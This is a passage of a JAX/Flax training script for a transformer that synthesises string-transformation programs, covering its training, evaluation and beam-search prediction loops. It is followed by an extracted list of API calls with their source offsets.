raise ValueError('Incorrect shapes. Got shape %s logits and %s targets' %
(str(logits.shape), str(targets.shape)))
acc = jnp.equal(jnp.argmax(logits, axis=-1), targets)
normalizing_factor = jnp.prod(jnp.asarray(targets.shape))
if weights is not None:
acc = acc * weights
normalizing_factor = weights.sum()
return acc.sum(), normalizing_factor
def compute_metrics(logits, targets, weights):
"""Compute summary metrics."""
loss, weight_sum = compute_weighted_cross_entropy(logits, targets, weights)
acc, _ = compute_weighted_accuracy(logits, targets, weights)
metrics = {
'loss': loss,
'accuracy': acc,
'denominator': weight_sum,
}
metrics = jax.lax.psum(metrics, 'batch')
return metrics
# Train / eval / decode step functions.
# -----------------------------------------------------------------------------
def train_step(optimizer,
inputs,
outputs,
programs,
learning_rate_fn,
config,
dropout_rng):
"""Train on batch of program tasks."""
# We handle PRNG splitting inside the top pmap, rather
# than handling it outside in the training loop - doing the
# latter can add some stalls to the devices.
dropout_rng, new_dropout_rng = jax.random.split(dropout_rng)
weights = jnp.where(programs > 0, 1, 0).astype(jnp.float32)
def loss_fn(params):
"""Loss function used for training."""
logits = models.DecomposeAttentionTransformer(config).apply(
{'params': params},
inputs,
outputs,
programs,
rngs={'dropout': dropout_rng})
loss, weight_sum = compute_weighted_cross_entropy(logits, programs, weights)
mean_loss = loss / weight_sum
return mean_loss, logits
step = optimizer.state.step
lr = learning_rate_fn(step)
grad_fn = jax.value_and_grad(loss_fn, has_aux=True)
(_, logits), grad = grad_fn(optimizer.target)
grad = jax.lax.pmean(grad, 'batch')
new_optimizer = optimizer.apply_gradient(grad, learning_rate=lr)
# Get metrics.
metrics = compute_metrics(logits, programs, weights)
metrics['learning_rate'] = lr
return new_optimizer, metrics, new_dropout_rng
def eval_step(params, inputs, outputs, programs, eos_token, config):
"""Collect metrics for evaluation during training."""
weights = jnp.where(
jnp.logical_and(programs > 0,
jnp.logical_and(programs != config.base_config.bos_token,
programs != eos_token)),
1, 0).astype(jnp.float32)
logits = models.DecomposeAttentionTransformer(config).apply(
{'params': params}, inputs, outputs, programs)
return compute_metrics(logits, programs, weights)
def initialize_cache(inputs, outputs, programs, max_decode_len, config):
"""Initialize a cache for a given input shape and max decode length."""
target_shape = (programs.shape[0], max_decode_len)
dtype = config.base_config.dtype
initial_variables = models.DecomposeAttentionTransformer(config).init(
jax.random.PRNGKey(0),
jnp.ones(inputs.shape, dtype),
jnp.ones(outputs.shape, dtype),
jnp.ones(target_shape, dtype))
return initial_variables['cache']
def predict_step(params,
inputs,
outputs,
cache,
beam_size,
eos_token,
max_decode_len,
config,
slow_decode=True):
"""Predict translation with fast decoding beam search on a batch."""
# Prepare transformer fast-decoder call for beam search: for beam search, we
# need to set up our decoder model to handle a batch size equal to
# batch_size * beam_size, where each batch item's data is expanded in-place
# rather than tiled.
flat_encoded = decode.flat_batch_beam_expand(
models.DecomposeAttentionTransformer(config).apply(
{'params': params},
inputs,
outputs,
method=models.DecomposeAttentionTransformer.encode),
beam_size)
encoded_padding_mask = jnp.where(outputs > 0, 1, 0).astype(jnp.float32)
flat_encoded_padding_mask = decode.flat_batch_beam_expand(
encoded_padding_mask, beam_size)
if slow_decode:
def tokens_ids_to_logits(flat_ids):
"""Token slice to logits from decoder model."""
# --> [batch * beam, 1, vocab]
flat_logits = models.DecomposeAttentionTransformer(config=config).apply(
{'params': params},
flat_ids,
flat_encoded,
flat_encoded_padding_mask,
method=models.DecomposeAttentionTransformer.decode)
return flat_logits
else:
def tokens_ids_to_logits(flat_ids, flat_cache):
"""Token slice to logits from decoder model."""
# --> [batch * beam, 1, vocab]
flat_logits, new_vars = models.DecomposeAttentionTransformer(
config=config).apply(
{'params': params, 'cache': flat_cache},
flat_ids,
flat_encoded,
flat_encoded_padding_mask,
mutable=['cache'],
method=models.DecomposeAttentionTransformer.decode)
new_flat_cache = new_vars['cache']
# Remove singleton sequence-length dimension:
# [batch * beam, 1, vocab] --> [batch * beam, vocab]
flat_logits = flat_logits.squeeze(axis=1)
return flat_logits, new_flat_cache
# Using the above-defined single-step decoder function, run a
# beam search over possible sequences given input encoding.
beam_seqs, _ = decode.beam_search(
inputs,
cache,
tokens_ids_to_logits,
beam_size=beam_size,
alpha=0.6,
bos_token=config.base_config.bos_token,
eos_token=eos_token,
max_decode_len=max_decode_len,
slow_decode=slow_decode)
# Beam search returns [n_batch, n_beam, n_length] with beam dimension
# sorted in increasing order of log-probability.
return beam_seqs
# Util functions for prediction
# -----------------------------------------------------------------------------
def pad_examples(x, desired_batch_size):
"""Expand batch to desired size by repeating last slice."""
batch_pad = desired_batch_size - x.shape[0]
tile_dims = [1] * len(x.shape)
tile_dims[0] = batch_pad
return np.concatenate([x, np.tile(x[-1], tile_dims)], axis=0)
def tohost(x):
"""Collect batches from all devices to host and flatten batch dimensions."""
n_device, n_batch, *remaining_dims = x.shape
return x.reshape((n_device * n_batch,) + tuple(remaining_dims))
def per_host_sum_pmap(in_tree):
"""Execute psum on in_tree's leaves over one device per host."""
host2devices = collections.defaultdict(list)
for d in jax.devices():
host2devices[d.host_id].append(d)
devices = [host2devices[k][0] for k in host2devices]
host_psum = jax.pmap(lambda x: jax.lax.psum(x, 'i'), 'i', devices=devices)
def pre_pmap(xs):
return jax.tree_map(lambda x: jnp.broadcast_to(x, (1,) + x.shape), xs)
def post_pmap(xs):
return jax.tree_map(lambda x: x[0], xs)
return post_pmap(host_psum(pre_pmap(in_tree)))
def eval_predicted(predicted, inputs, outputs, parse_beam_fn):
"""Evaluate predicted program beams."""
best_p, best_score = None, -1
# predicted shape [beam_size, length]
for beam in predicted[::-1]:
try:
p = parse_beam_fn(beam)
p_outs = [p(inp) for inp in inputs]
score = np.sum([p_out == out for p_out, out in zip(p_outs, outputs)])
if score > best_score:
best_p, best_score = p, score
except: # pylint: disable=bare-except
pass
if best_score >= len(inputs): # Found solution.
break
return best_p, best_score
def shorten(key):
splits = key.split('_')
return ''.join(s[0] for s in splits)
def main(_):
tf.enable_v2_behavior()
tf.random.set_seed(FLAGS.seed)
np.random.seed(FLAGS.seed)
random.seed(FLAGS.seed)
# BOS special attention only makes sense if we are using relative attention
# and it's not the baseline.
if FLAGS.bos_special_attention and (not FLAGS.use_relative_attention or
FLAGS.attention_mask_type == 'baseline'):
raise ValueError(
"bos_special_attention doesn't work when use_relative_attention={} and "
'attention_mask_type={}'.format(FLAGS.use_relative_attention,
FLAGS.attention_mask_type))
if not gfile.isdir(FLAGS.save_dir):
gfile.makedirs(FLAGS.save_dir)
hparam_str_dict = dict(seed=FLAGS.seed, lr=FLAGS.lr)
# Get hyperparmaters
if FLAGS.xm_parameters:
for key, value in json.loads(FLAGS.xm_parameters).items():
if key not in hparam_str_dict:
hparam_str_dict[key] = value
hparam_str = ','.join(['%s=%s' % (shorten(k), str(hparam_str_dict[k]))
for k in sorted(hparam_str_dict.keys())])
# Number of local devices for this host.
n_devices = jax.local_device_count()
if jax.host_id() == 0:
summary_writer = tensorboard.SummaryWriter(
os.path.join(FLAGS.save_dir, 'tb', hparam_str))
batch_size = FLAGS.per_device_batch_size * n_devices
io_shape = (FLAGS.per_device_batch_size,
FLAGS.num_strings_per_task,
FLAGS.max_characters)
program_shape = (FLAGS.per_device_batch_size, FLAGS.max_program_length)
# Setup DSL
# ---------------------------------------------------------------------------
# Build token tables.
id_char_table = {i+1: char for (i, char) in enumerate(dsl.CHARACTER)}
char_id_table = {char: id for id, char in id_char_table.items()}
id_token_table, token_id_table = dsl_tokens.build_token_tables()
io_vocab_size = len(char_id_table) + 1 # For padding.
program_vocab_size = len(token_id_table) + 1
bos_token = token_id_table[dsl.BOS]
eos_token = token_id_table[dsl.EOS]
# Parse io and program token sequences (for eval).
def decode_io(inputs, outputs):
"""Decode io examples tokens."""
def decode_str(s):
"""Decode string tokens."""
return ''.join([id_char_table[c_id] for c_id in s if c_id > 0])
inps, outs = [], []
for inp, out in zip(inputs, outputs):
inps.append(decode_str(inp))
outs.append(decode_str(out))
return inps, outs
def decode_program(program):
"""Decode program tokens."""
program = program[:np.argmax(program == eos_token) + 1].astype(np.int32)
program = program[program != bos_token]
try:
return dsl.decode_program(program.tolist(), id_token_table)
except: # pylint: disable=bare-except
return None # Program does not compile.
# Load Dataset
# ---------------------------------------------------------------------------
logging.info('Initializing dataset.')
if not FLAGS.dataset_filepattern:
raise ValueError('Must specify filepattern to dataset.')
# Training dataset.
logging.info('Loading dataset from %s', FLAGS.dataset_filepattern)
padded_shapes = (io_shape[1:], io_shape[1:], program_shape[1:])
logging.info('padded_shapes: %s', padded_shapes)
dataset = input_pipeline.create_dataset_from_tf_record(
FLAGS.dataset_filepattern, token_id_table, char_id_table)
dataset = dataset.padded_batch(
batch_size,
padded_shapes=padded_shapes,
drop_remainder=True)
# Split evaluation and training.
eval_ds = dataset.take(FLAGS.num_eval_steps)
# Decrease batch of predict dataset to handle beam search.
predict_ds = eval_ds.unbatch().padded_batch(
int(np.ceil(batch_size / 10)),
padded_shapes=padded_shapes)
train_ds = dataset.skip(FLAGS.num_eval_steps).repeat()
train_iter = train_ds.as_numpy_iterator()
# Build Model and Optimizer
# ---------------------------------------------------------------------------
use_dropout = False
base_config = base_models.TransformerConfig(
vocab_size=io_vocab_size,
output_vocab_size=program_vocab_size,
shift=True,
emb_dim=FLAGS.embedding_dim,
num_heads=FLAGS.num_heads,
num_layers=FLAGS.num_layers,
qkv_dim=FLAGS.embedding_dim,
mlp_dim=FLAGS.hidden_dim,
max_len=max(FLAGS.max_characters, FLAGS.max_program_length),
use_relative_attention=FLAGS.use_relative_attention,
deterministic=not use_dropout,
decode=False,
bos_token=bos_token)
train_config = models.DecomposeAttentionTransformerConfig(
base_config=base_config,
attention_mask_type=FLAGS.attention_mask_type,
bos_special_attention=FLAGS.bos_special_attention)
eval_config = models.DecomposeAttentionTransformerConfig(
base_config=base_config.replace(deterministic=not use_dropout),
attention_mask_type=FLAGS.attention_mask_type,
bos_special_attention=FLAGS.bos_special_attention)
predict_config = models.DecomposeAttentionTransformerConfig(
base_config=base_config.replace(
shift=False, deterministic=not use_dropout,
decode=not FLAGS.slow_decode),
attention_mask_type=FLAGS.attention_mask_type,
bos_special_attention=FLAGS.bos_special_attention)
rng = jax.random.PRNGKey(FLAGS.seed)
rng = jax.random.fold_in(rng, jax.host_id())
rng, init_rng = jax.random.split(rng)
m = models.DecomposeAttentionTransformer(eval_config)
initial_variables = jax.jit(m.init)(
{'params': init_rng, 'dropout': init_rng},
jnp.ones(io_shape, jnp.float32),
jnp.ones(io_shape, jnp.float32),
jnp.ones(program_shape, jnp.float32))
optimizer_def = optim.Adam(
FLAGS.lr,
beta1=0.9,
beta2=0.98,
eps=1e-9,
weight_decay=FLAGS.weight_decay)
optimizer = optimizer_def.create(initial_variables['params'])
del initial_variables # Don't keep a copy of the initial model.
start_step = 0
if FLAGS.restore_checkpoints:
# Restore unreplicated optimizer + model state from last checkpoint.
optimizer = checkpoints.restore_checkpoint(
os.path.join(FLAGS.save_dir, 'checkpoints', hparam_str), optimizer)
# Grab last step.
start_step = int(optimizer.state.step)
logging.info('Found model checkpointed at step %d.', start_step)
if FLAGS.finetune_start_step > 0:
logging.info('Checking that start_step (%s) == finetune_start_step (%s)',
start_step, FLAGS.finetune_start_step)
assert start_step == FLAGS.finetune_start_step
# Replicate optimizer.
optimizer = jax_utils.replicate(optimizer)
# TODO(jxihong): Implement fast decoding.
assert FLAGS.slow_decode, 'Fast decoding is not implemented yet.'
if FLAGS.finetune_start_step <= 0:
learning_rate_fn = create_learning_rate_scheduler(
base_learning_rate=FLAGS.lr)
else:
# Constant LR for finetuning.
learning_rate_fn = create_learning_rate_scheduler(
base_learning_rate=FLAGS.lr,
factors='constant')
p_train_step = jax.pmap(
functools.partial(
train_step,
learning_rate_fn=learning_rate_fn,
config=train_config),
axis_name='batch')
p_eval_step = jax.pmap(
functools.partial(eval_step,
eos_token=eos_token,
config=eval_config),
axis_name='batch')
p_init_cache = jax.pmap(
functools.partial(
initialize_cache,
max_decode_len=FLAGS.max_program_length,
config=predict_config),
axis_name='batch')
p_pred_step = jax.pmap(
functools.partial(
predict_step,
eos_token=eos_token,
max_decode_len=FLAGS.max_program_length,
config=predict_config,
slow_decode=FLAGS.slow_decode),
axis_name='batch',
static_broadcasted_argnums=(4,))
# Main Train Loop
# ---------------------------------------------------------------------------
dropout_rng = jax.random.split(rng, jax.local_device_count())
del rng
metrics_all = []
tick = time.time()
for step in range(start_step, FLAGS.num_train_steps):
inputs, outputs, programs = common_utils.shard(next(train_iter))
optimizer, metrics, dropout_rng = p_train_step(
optimizer, inputs, outputs, programs, dropout_rng=dropout_rng)
metrics_all.append(metrics)
is_last_step = step == FLAGS.num_train_steps - 1
# Save a Checkpoint
if (step % FLAGS.checkpoint_freq == 0 and step > 0) or is_last_step:
if jax.host_id() == 0:
# Save unreplicated optimizer + model state.
checkpoints.save_checkpoint(
os.path.join(FLAGS.save_dir, 'checkpoints', hparam_str),
jax_utils.unreplicate(optimizer),
step)
# Periodic metric handling.
# Training Metrics
if (step and step % FLAGS.log_freq == 0) or is_last_step:
logging.info('Gathering training metrics.')
metrics_all = common_utils.get_metrics(metrics_all)
lr = metrics_all.pop('learning_rate').mean()
metrics_sums = jax.tree_map(jnp.sum, metrics_all)
denominator = metrics_sums.pop('denominator')
summary = jax.tree_map(
lambda x: x / denominator, # pylint: disable=cell-var-from-loop
metrics_sums)
summary['learning_rate'] = lr
# Calculate (clipped) perplexity after averaging log-perplexities:
summary['perplexity'] = jnp.clip(jnp.exp(summary['loss']), a_max=1.0e4)
if jax.host_id() == 0:
logging.info('Train in step: %d, loss: %.4f', step, summary['loss'])
tock = time.time()
steps_per_sec = FLAGS.log_freq / (tock - tick)
tick = tock
summary_writer.scalar('train/steps per second', steps_per_sec, step)
for key, val in summary.items():
summary_writer.scalar('train/' + key, val, step)
summary_writer.flush()
# Reset metric accumulation for next evaluation cycle.
metrics_all = []
# Evaluation Metrics
if (step and step % FLAGS.eval_freq == 0) or is_last_step:
logging.info('Gathering evaluation metrics.')
t_evaluation_start = time.time()
eval_metrics = []
for batches in eval_ds.as_numpy_iterator():
inputs, outputs, programs = common_utils.shard(batches)
metrics = p_eval_step(optimizer.target, inputs, outputs, programs)
eval_metrics.append(metrics)
eval_metrics = common_utils.get_metrics(eval_metrics)
eval_metrics_sums = jax.tree_map(jnp.sum, eval_metrics)
eval_denominator = eval_metrics_sums.pop('denominator')
eval_summary = jax.tree_map(
lambda x: x / eval_denominator, # pylint: disable=cell-var-from-loop
eval_metrics_sums)
if jax.host_id() == 0:
logging.info('Evaluation time: %.4f s step %d, loss: %.4f.',
time.time()-t_evaluation_start, step, eval_summary['loss'])
for key, val in eval_summary.items():
summary_writer.scalar('eval/' + key, val, step)
summary_writer.flush()
# Beam search metrics.
if (step and step % FLAGS.predict_freq == 0) or is_last_step:
logging.info('Gathering beam search metrics.')
for beam_size in [1, 5, 10, 20, 50]:
t_inference_start = time.time()
pred_acc = 0
pred_denominator = 0
ios, targets, predictions, top_of_beams = [], [], [], []
for batches in predict_ds.as_numpy_iterator():
pred_batch = batches
# Handle final odd-sized batch by padding instead of dropping it.
cur_pred_batch_size = pred_batch[0].shape[0]
if cur_pred_batch_size % n_devices:
padded_size = int(
np.ceil(cur_pred_batch_size / n_devices) * n_devices)
# pylint: disable=cell-var-from-loop
pred_batch = jax.tree_map(
lambda x: pad_examples(x, padded_size), pred_batch)
inputs, outputs, programs = common_utils.shard(pred_batch)
cache = (p_init_cache(inputs, outputs, programs)
if not FLAGS.slow_decode else None)
predicted = p_pred_step(optimizer.target, inputs, outputs, cache,
beam_size)
predicted = tohost(predicted)
inputs, outputs, programs = map(tohost, (inputs, outputs, programs))
pred_denominator += programs.shape[0]
for i, beams in enumerate(predicted):
inps, outs = decode_io(inputs[i], outputs[i])
p, p_score = eval_predicted(
beams, inps, outs, parse_beam_fn=decode_program)
if p_score >= len(inps):
pred_acc += 1
ios.append(' ; '.join(map(str, zip(inps, outs))))
targets.append(decode_program(programs[i]).to_string())
try:
predictions.append(p.to_string())
except: # pylint: disable=bare-except
predictions.append('Did not compile')
logging.info('ios: %s', ios[-1])
logging.info('target: %s', targets[-1])
beams_log = []
for beam in beams:
try:
beams_log.append(decode_program(beam).to_string())
except: # pylint: disable=bare-except
beams_log.append('Did not compile')
logging.info('predicted beam: %s', '\n'.join(beams_log))
top_of_beam = []
for index, beam in enumerate(beams[:-5:-1]):
try:
decoded_program = decode_program(beam).to_string()
except: # pylint: disable=bare-except
decoded_program = 'Did not compile'
top_of_beam.append('index: {}, decoded: {}, tokens: {}'.format(
index, decoded_program, beam))
top_of_beams.append('\n\n'.join(top_of_beam))
all_pred_acc, all_pred_denominator = per_host_sum_pmap(
jax.tree_map(np.array, (pred_acc, pred_denominator)))
# Record beam search results as text summaries.
message = []
for n in np.random.choice(np.arange(len(predictions)), 8):
text = (f'ios: {ios[n]}\n\ntarget: {targets[n]}\n\n'
f'predicted: {predictions[n]}\n\n'
f'top of beam:\n\n{top_of_beams[n]}\n\n')
message.append(text)
# Write to tensorboard.
if jax.host_id() == 0:
slow_or_fast = 'slow' if FLAGS.slow_decode else 'fast'
logging.info(
'Prediction time, %s (beam %d): %.4f s, step %d, score %.4f',
slow_or_fast, beam_size, time.time() - t_inference_start, step,
all_pred_acc / all_pred_denominator)
summary_writer.scalar(
'predict-{}/score-{}'.format(slow_or_fast, beam_size),
all_pred_acc / all_pred_denominator, step)
summary_writer.text('samples-{}'.format(beam_size),
'\n------\n'.join(message), step)
summary_writer.flush()
if __name__ == '__main__':
app.run(main)
| [
"flax.training.common_utils.shard",
"flax.optim.Adam",
"tensorflow.compat.v2.random.set_seed",
"latent_programmer.tasks.robust_fill.tokens.build_token_tables",
"absl.logging.info",
"jax.tree_map",
"latent_programmer.decode.beam_search",
"flax.training.common_utils.onehot",
"jax.jit",
"sys.path.append",
"absl.flags.DEFINE_float",
"jax.random.split",
"jax.random.PRNGKey",
"absl.flags.DEFINE_boolean",
"absl.app.run",
"jax.numpy.asarray",
"flax.jax_utils.replicate",
"flax.jax_utils.unreplicate",
"numpy.random.seed",
"jax.value_and_grad",
"numpy.tile",
"numpy.ceil",
"json.loads",
"jax.lax.psum",
"jax.numpy.where",
"jax.numpy.cos",
"jax.local_device_count",
"jax.devices",
"jax.numpy.broadcast_to",
"latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer",
"numpy.argmax",
"jax.lax.pmean",
"jax.numpy.ones",
"flax.training.common_utils.get_metrics",
"absl.flags.DEFINE_string",
"time.time",
"jax.host_id",
"tensorflow.compat.v2.enable_v2_behavior",
"latent_programmer.decomposition_transformer_attention.input_pipeline.create_dataset_from_tf_record",
"latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformerConfig",
"jax.numpy.minimum",
"jax.numpy.logical_and",
"absl.flags.DEFINE_bool",
"absl.flags.DEFINE_integer",
"jax.numpy.sqrt",
"os.path.join",
"jax.numpy.exp",
"random.seed",
"jax.numpy.maximum",
"collections.defaultdict",
"latent_programmer.decode.flat_batch_beam_expand",
"functools.partial",
"flax.linen.log_softmax",
"jax.numpy.argmax"
] | [((1590, 1615), 'sys.path.append', 'sys.path.append', (['"""../../"""'], {}), "('../../')\n", (1605, 1615), False, 'import sys\n'), ((1658, 1724), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""seed"""', '(0)', '"""Fixed random seed for training."""'], {}), "('seed', 0, 'Fixed random seed for training.')\n", (1678, 1724), False, 'from absl import flags\n'), ((1725, 1774), 'absl.flags.DEFINE_float', 'flags.DEFINE_float', (['"""lr"""', '(0.001)', '"""Learning rate."""'], {}), "('lr', 0.001, 'Learning rate.')\n", (1743, 1774), False, 'from absl import flags\n'), ((1774, 1863), 'absl.flags.DEFINE_float', 'flags.DEFINE_float', (['"""weight_decay"""', '(0.1)', '"""Decay factor for AdamW-style weight decay."""'], {}), "('weight_decay', 0.1,\n 'Decay factor for AdamW-style weight decay.')\n", (1792, 1863), False, 'from absl import flags\n'), ((1880, 1946), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""embedding_dim"""', '(256)', '"""Embedding dimension."""'], {}), "('embedding_dim', 256, 'Embedding dimension.')\n", (1900, 1946), False, 'from absl import flags\n'), ((1947, 2007), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""hidden_dim"""', '(512)', '"""Hidden dimension."""'], {}), "('hidden_dim', 512, 'Hidden dimension.')\n", (1967, 2007), False, 'from absl import flags\n'), ((2008, 2065), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""num_heads"""', '(4)', '"""Number of layers."""'], {}), "('num_heads', 4, 'Number of layers.')\n", (2028, 2065), False, 'from absl import flags\n'), ((2066, 2135), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""num_layers"""', '(3)', '"""Number of Transformer heads."""'], {}), "('num_layers', 3, 'Number of Transformer heads.')\n", (2086, 2135), False, 'from absl import flags\n'), ((2136, 2214), 'absl.flags.DEFINE_boolean', 'flags.DEFINE_boolean', (['"""slow_decode"""', '(True)', '"""Use slow decoding for prediction?"""'], {}), "('slow_decode', True, 'Use slow decoding for prediction?')\n", (2156, 2214), False, 'from absl import flags\n'), ((2216, 2305), 'absl.flags.DEFINE_string', 'flags.DEFINE_string', (['"""dataset_filepattern"""', 'None', '"""Filepattern for TFRecord dataset."""'], {}), "('dataset_filepattern', None,\n 'Filepattern for TFRecord dataset.')\n", (2235, 2305), False, 'from absl import flags\n'), ((2322, 2414), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""per_device_batch_size"""', '(16)', '"""Number of program tasks in a batch."""'], {}), "('per_device_batch_size', 16,\n 'Number of program tasks in a batch.')\n", (2342, 2414), False, 'from absl import flags\n'), ((2432, 2527), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""num_strings_per_task"""', '(4)', '"""Number of input/output strings per task."""'], {}), "('num_strings_per_task', 4,\n 'Number of input/output strings per task.')\n", (2452, 2527), False, 'from absl import flags\n'), ((2545, 2636), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""max_program_length"""', '(100)', '"""Maximum number of tokens in program."""'], {}), "('max_program_length', 100,\n 'Maximum number of tokens in program.')\n", (2565, 2636), False, 'from absl import flags\n'), ((2654, 2758), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""max_characters"""', '(120)', '"""Maximum number of characters in input/output strings."""'], {}), "('max_characters', 120,\n 'Maximum number of characters in input/output strings.')\n", (2674, 2758), False, 'from absl import flags\n'), ((2777, 2847), 'absl.flags.DEFINE_string', 'flags.DEFINE_string', (['"""save_dir"""', 'None', '"""Directory to save results to."""'], {}), "('save_dir', None, 'Directory to save results to.')\n", (2796, 2847), False, 'from absl import flags\n'), ((2848, 2925), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""num_train_steps"""', '(2000000)', '"""Number of training steps."""'], {}), "('num_train_steps', 2000000, 'Number of training steps.')\n", (2868, 2925), False, 'from absl import flags\n'), ((2926, 2999), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""num_eval_steps"""', '(10)', '"""Number of evaluation steps."""'], {}), "('num_eval_steps', 10, 'Number of evaluation steps.')\n", (2946, 2999), False, 'from absl import flags\n'), ((3000, 3085), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""log_freq"""', '(1000)', '"""Number of steps between training logs."""'], {}), "('log_freq', 1000, 'Number of steps between training logs.'\n )\n", (3020, 3085), False, 'from absl import flags\n'), ((3081, 3153), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""eval_freq"""', '(2000)', '"""Number of steps between eval."""'], {}), "('eval_freq', 2000, 'Number of steps between eval.')\n", (3101, 3153), False, 'from absl import flags\n'), ((3154, 3254), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""predict_freq"""', '(50000)', '"""Number of steps between prediction (beam search)."""'], {}), "('predict_freq', 50000,\n 'Number of steps between prediction (beam search).')\n", (3174, 3254), False, 'from absl import flags\n'), ((3272, 3367), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""checkpoint_freq"""', '(50000)', '"""Number of steps between checkpoint saves."""'], {}), "('checkpoint_freq', 50000,\n 'Number of steps between checkpoint saves.')\n", (3292, 3367), False, 'from absl import flags\n'), ((3385, 3529), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""finetune_start_step"""', '(-1)', '"""Step the initial checkpoint should start at for finetuning, or -1 if not finetuning."""'], {}), "('finetune_start_step', -1,\n 'Step the initial checkpoint should start at for finetuning, or -1 if not finetuning.'\n )\n", (3405, 3529), False, 'from absl import flags\n'), ((3566, 3671), 'absl.flags.DEFINE_bool', 'flags.DEFINE_bool', (['"""restore_checkpoints"""', '(True)', '"""Whether to restore from existing model checkpoints."""'], {}), "('restore_checkpoints', True,\n 'Whether to restore from existing model checkpoints.')\n", (3583, 3671), False, 'from absl import flags\n'), ((3687, 3852), 'absl.flags.DEFINE_string', 'flags.DEFINE_string', (['"""attention_mask_type"""', '"""bos_full_attention"""', '"""The kind of attention mask to use. Options are: baseline, bos_to_bos, bos_full_attention"""'], {}), "('attention_mask_type', 'bos_full_attention',\n 'The kind of attention mask to use. Options are: baseline, bos_to_bos, bos_full_attention'\n )\n", (3706, 3852), False, 'from absl import flags\n'), ((3888, 3990), 'absl.flags.DEFINE_bool', 'flags.DEFINE_bool', (['"""use_relative_attention"""', '(True)', '"""Whether to use relative positonal embeddings."""'], {}), "('use_relative_attention', True,\n 'Whether to use relative positonal embeddings.')\n", (3905, 3990), False, 'from absl import flags\n'), ((4005, 4131), 'absl.flags.DEFINE_bool', 'flags.DEFINE_bool', (['"""bos_special_attention"""', '(False)', '"""Whether to use special relative attention computation for BOS tokens."""'], {}), "('bos_special_attention', False,\n 'Whether to use special relative attention computation for BOS tokens.')\n", (4022, 4131), False, 'from absl import flags\n'), ((4207, 4296), 'absl.flags.DEFINE_string', 'flags.DEFINE_string', (['"""xm_parameters"""', 'None', '"""String specifying hyperparamter search."""'], {}), "('xm_parameters', None,\n 'String specifying hyperparamter search.')\n", (4226, 4296), False, 'from absl import flags\n'), ((7127, 7173), 'flax.training.common_utils.onehot', 'common_utils.onehot', (['targets', 'logits.shape[-1]'], {}), '(targets, logits.shape[-1])\n', (7146, 7173), False, 'from flax.training import common_utils\n'), ((8564, 8594), 'jax.lax.psum', 'jax.lax.psum', (['metrics', '"""batch"""'], {}), "(metrics, 'batch')\n", (8576, 8594), False, 'import jax\n'), ((9159, 9188), 'jax.random.split', 'jax.random.split', (['dropout_rng'], {}), '(dropout_rng)\n', (9175, 9188), False, 'import jax\n'), ((9719, 9760), 'jax.value_and_grad', 'jax.value_and_grad', (['loss_fn'], {'has_aux': '(True)'}), '(loss_fn, has_aux=True)\n', (9737, 9760), False, 'import jax\n'), ((9818, 9846), 'jax.lax.pmean', 'jax.lax.pmean', (['grad', '"""batch"""'], {}), "(grad, 'batch')\n", (9831, 9846), False, 'import jax\n'), ((12015, 12077), 'latent_programmer.decode.flat_batch_beam_expand', 'decode.flat_batch_beam_expand', (['encoded_padding_mask', 'beam_size'], {}), '(encoded_padding_mask, beam_size)\n', (12044, 12077), False, 'from latent_programmer import decode\n'), ((13395, 13607), 'latent_programmer.decode.beam_search', 'decode.beam_search', (['inputs', 'cache', 'tokens_ids_to_logits'], {'beam_size': 'beam_size', 'alpha': '(0.6)', 'bos_token': 'config.base_config.bos_token', 'eos_token': 'eos_token', 'max_decode_len': 'max_decode_len', 'slow_decode': 'slow_decode'}), '(inputs, cache, tokens_ids_to_logits, beam_size=beam_size,\n alpha=0.6, bos_token=config.base_config.bos_token, eos_token=eos_token,\n max_decode_len=max_decode_len, slow_decode=slow_decode)\n', (13413, 13607), False, 'from latent_programmer import decode\n'), ((14514, 14543), 'collections.defaultdict', 'collections.defaultdict', (['list'], {}), '(list)\n', (14537, 14543), False, 'import collections\n'), ((14555, 14568), 'jax.devices', 'jax.devices', ([], {}), '()\n', (14566, 14568), False, 'import jax\n'), ((15633, 15656), 'tensorflow.compat.v2.enable_v2_behavior', 'tf.enable_v2_behavior', ([], {}), '()\n', (15654, 15656), True, 'import tensorflow.compat.v2 as tf\n'), ((15660, 15690), 'tensorflow.compat.v2.random.set_seed', 'tf.random.set_seed', (['FLAGS.seed'], {}), '(FLAGS.seed)\n', (15678, 15690), True, 'import tensorflow.compat.v2 as tf\n'), ((15693, 15719), 'numpy.random.seed', 'np.random.seed', (['FLAGS.seed'], {}), '(FLAGS.seed)\n', (15707, 15719), True, 'import numpy as np\n'), ((15722, 15745), 'random.seed', 'random.seed', (['FLAGS.seed'], {}), '(FLAGS.seed)\n', (15733, 15745), False, 'import random\n'), ((16766, 16790), 'jax.local_device_count', 'jax.local_device_count', ([], {}), '()\n', (16788, 16790), False, 'import jax\n'), ((17466, 17497), 'latent_programmer.tasks.robust_fill.tokens.build_token_tables', 'dsl_tokens.build_token_tables', ([], {}), '()\n', (17495, 17497), True, 'from latent_programmer.tasks.robust_fill import tokens as dsl_tokens\n'), ((18542, 18579), 'absl.logging.info', 'logging.info', (['"""Initializing dataset."""'], {}), "('Initializing dataset.')\n", (18554, 18579), False, 'from absl import logging\n'), ((18702, 18768), 'absl.logging.info', 'logging.info', (['"""Loading dataset from %s"""', 'FLAGS.dataset_filepattern'], {}), "('Loading dataset from %s', FLAGS.dataset_filepattern)\n", (18714, 18768), False, 'from absl import logging\n'), ((18837, 18885), 'absl.logging.info', 'logging.info', (['"""padded_shapes: %s"""', 'padded_shapes'], {}), "('padded_shapes: %s', padded_shapes)\n", (18849, 18885), False, 'from absl import 